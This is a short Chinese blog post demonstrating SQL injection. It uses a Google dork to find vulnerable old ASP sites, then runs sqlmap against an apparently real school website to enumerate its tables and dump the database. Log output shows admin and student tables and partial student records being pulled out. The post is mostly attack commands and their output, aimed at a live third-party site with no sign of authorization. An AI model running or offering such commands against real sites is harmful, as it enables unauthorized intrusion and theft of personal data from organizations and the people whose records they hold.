标签:sql注入

一个简单的sql注入实例

很多老的asp网站存在sql注入,google上搜 :inurl:TeachView.asp  会有很多小网站存在这个问题,下面进行一个简单的演示。

使用工具sqlmap

sqlmap -u http://www.lcztxx.com/TeachView.asp?id=23 进行sql注入尝试

sqlmap -u http://www.lcztxx.com/TeachView.asp?id=23 –tables 展示所有的数据库表

Database: Microsoft_Access_masterdb
[6 tables]
+———-+
| admin |
| feedback |
| menu |
| news |
| school |
| student |
+———-+

sqlmap -u http://www.lcztxx.com/TeachView.asp?id=23 –dump 尝试脱库操作。

[20:46:17] [INFO] retrieved: id
[20:46:18] [INFO] retrieved: title
[20:47:12] [INFO] retrieved: cname
[20:48:03] [INFO] retrieved: content
[20:49:19] [INFO] retrieved: num

[20:51:59] [INFO] fetching entries for table ‘student’ in database ‘Microsoft_Access_masterdb’
[20:51:59] [INFO] fetching number of entries for table ‘student’ in database ‘Microsoft_Access_masterdb’
[20:51:59] [INFO] retrieved: 9
[20:52:05] [INFO] fetching number of distinct values for column ‘id’
[20:52:05] [INFO] retrieved: 9
[20:52:11] [INFO] using column ‘id’ as a pivot for retrieving row data
[20:52:11] [INFO] retrieved: 10
[20:52:20] [INFO] retrieved: 470
[20:52:30] [INFO] retrieved: Student
[20:52:51] [INFO] retrieved:
[20:52:51] [INFO] retrieved: <img src=”../upload/2014611528324449954.jpg”

速度有点慢 就不进行了…